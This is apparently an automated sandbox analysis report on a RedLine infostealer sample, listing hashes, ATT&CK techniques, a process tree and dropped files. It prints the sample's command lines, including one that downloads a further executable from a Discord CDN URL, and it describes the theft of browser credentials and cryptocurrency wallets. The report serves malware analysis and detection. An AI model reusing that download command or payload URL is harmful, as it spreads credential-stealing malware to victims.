redline | b059aaa7da26904746289493bcc558f552408b0a4df2e86ff8ed0c675f4dc23e

General

Target

@Kypidss.exe
Size

92KB
MD5

6feb31e3fbfadaf1029223c60bc0d60c
SHA1

13555e90f6bd008c03403e09fcd17d6a65ab461f
SHA256

b059aaa7da26904746289493bcc558f552408b0a4df2e86ff8ed0c675f4dc23e
SHA512

5680e753eb00386413fa4352a9169b6a0d1eb13b6ae5fe9c167e9999d40634d9318fe2bc91c6f76df22f00e0dc174fc38207a601024bf9f3093e71924eef44cb

Score

10^/10

redline discovery infostealer spyware stealer upx

Malware Config

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Downloads MZ/PE file
Executes dropped EXE 4 IoCs

Processes:

mine.exeextd.exeextd.exeextd.exe

pid process

752 mine.exe
3864 extd.exe
2848 extd.exe
3876 extd.exe

pid	process
752	mine.exe
3864	extd.exe
2848	extd.exe
3876	extd.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe	upx

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

15 ipinfo.io
16 ipinfo.io
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

@Kypidss.exe

pid process

652 @Kypidss.exe
652 @Kypidss.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

@Kypidss.exe

description pid process

Token: SeDebugPrivilege 652 @Kypidss.exe

flow	ioc
15	ipinfo.io
16	ipinfo.io

pid	process
652	@Kypidss.exe
652	@Kypidss.exe

description	pid	process
Token: SeDebugPrivilege	652	@Kypidss.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

@Kypidss.exemine.execmd.exe

description	pid	process	target process
PID 652 wrote to memory of 752	652	@Kypidss.exe	mine.exe
PID 652 wrote to memory of 752	652	@Kypidss.exe	mine.exe
PID 752 wrote to memory of 1556	752	mine.exe	cmd.exe
PID 752 wrote to memory of 1556	752	mine.exe	cmd.exe
PID 1556 wrote to memory of 3864	1556	cmd.exe	extd.exe
PID 1556 wrote to memory of 3864	1556	cmd.exe	extd.exe
PID 1556 wrote to memory of 2848	1556	cmd.exe	extd.exe
PID 1556 wrote to memory of 2848	1556	cmd.exe	extd.exe
PID 1556 wrote to memory of 3876	1556	cmd.exe	extd.exe
PID 1556 wrote to memory of 3876	1556	cmd.exe	extd.exe

C:\Users\Admin\AppData\Local\Temp\@Kypidss.exe
"C:\Users\Admin\AppData\Local\Temp\@Kypidss.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:652

C:\Users\Admin\AppData\Local\Temp\mine.exe
"C:\Users\Admin\AppData\Local\Temp\mine.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:752

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\3B75.bat C:\Users\Admin\AppData\Local\Temp\mine.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1556

C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
4⤵
- Executes dropped EXE
PID:3864

C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
4⤵
- Executes dropped EXE
PID:2848

C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/868908533897363470/869566660368035880/welldone.exe" "welldone.exe" "" "" "" "" "" ""
4⤵
- Executes dropped EXE
PID:3876

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

2

T1081

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

2

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\3B75.bat
MD5
31e5e4e45e645d8729a1865445a20c37

SHA1
0b86aee14ae577e61f98fe8683b8b3c992a6b2ff

SHA256
6b06c88ef49eef9fb4f4d62952d974758384f91354f3d443cf69dc19a93e73a8

SHA512
cdb82a22ace68f3a56c82151aabd86fdcac7b4d0e2f74afe866317df9fba35f86f36ed249bcc1883ac26bf0aa864490ac8064680954be29cde760d2117302b07

Download Submit
C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe
MD5
c14ce13ab09b4829f67a879d735a10a1

SHA1
537e1ce843f07ce629699ef5742c42ee2f06e9b6

SHA256
ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a

SHA512
c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38

Download Submit
C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe
MD5
c14ce13ab09b4829f67a879d735a10a1

SHA1
537e1ce843f07ce629699ef5742c42ee2f06e9b6

SHA256
ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a

SHA512
c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38

Download Submit
C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe
MD5
c14ce13ab09b4829f67a879d735a10a1

SHA1
537e1ce843f07ce629699ef5742c42ee2f06e9b6

SHA256
ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a

SHA512
c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38

Download Submit
C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe
MD5
c14ce13ab09b4829f67a879d735a10a1

SHA1
537e1ce843f07ce629699ef5742c42ee2f06e9b6

SHA256
ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a

SHA512
c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38

Download Submit
C:\Users\Admin\AppData\Local\Temp\mine.exe
MD5
a71e5bd022c844df2ef80234f5ad0691

SHA1
9ce9dc60e09c536e62fdf60bc90318fd6299dcd4

SHA256
fdd3be574e0628170c34bba09040b12864014ab7701327634c202f462830981a

SHA512
aaa65d7c8b10200e053f4a04ee335fb122571a291b3dd07bec298ada1f1dc77145d63336a35978d6f98a3ba6b2fd1370ae600a8f2a8206f8ac995b347107f082

Download Submit
C:\Users\Admin\AppData\Local\Temp\mine.exe
MD5
a71e5bd022c844df2ef80234f5ad0691

SHA1
9ce9dc60e09c536e62fdf60bc90318fd6299dcd4

SHA256
fdd3be574e0628170c34bba09040b12864014ab7701327634c202f462830981a

SHA512
aaa65d7c8b10200e053f4a04ee335fb122571a291b3dd07bec298ada1f1dc77145d63336a35978d6f98a3ba6b2fd1370ae600a8f2a8206f8ac995b347107f082

Download Submit
memory/652-119-0x0000000004CA0000-0x0000000004CA1000-memory.dmp

Filesize
4KB

Download
memory/652-123-0x0000000006340000-0x0000000006341000-memory.dmp

Filesize
4KB

Download
memory/652-124-0x00000000068E0000-0x00000000068E1000-memory.dmp

Filesize
4KB

Download
memory/652-114-0x00000000003D0000-0x00000000003D1000-memory.dmp

Filesize
4KB

Download
memory/652-122-0x0000000006000000-0x0000000006001000-memory.dmp

Filesize
4KB

Download
memory/652-121-0x0000000004EF0000-0x0000000004EF1000-memory.dmp

Filesize
4KB

Download
memory/652-120-0x0000000004C90000-0x0000000004C91000-memory.dmp

Filesize
4KB

Download
memory/652-118-0x0000000004C40000-0x0000000004C41000-memory.dmp

Filesize
4KB

Download
memory/652-117-0x0000000004BE0000-0x0000000004BE1000-memory.dmp

Filesize
4KB

Download
memory/652-116-0x00000000052B0000-0x00000000052B1000-memory.dmp

Filesize
4KB

Download
memory/752-125-0x0000000000000000-mapping.dmp

Download
memory/1556-128-0x0000000000000000-mapping.dmp

Download
memory/2848-133-0x0000000000000000-mapping.dmp

Download
memory/3864-130-0x0000000000000000-mapping.dmp

Download
memory/3876-135-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing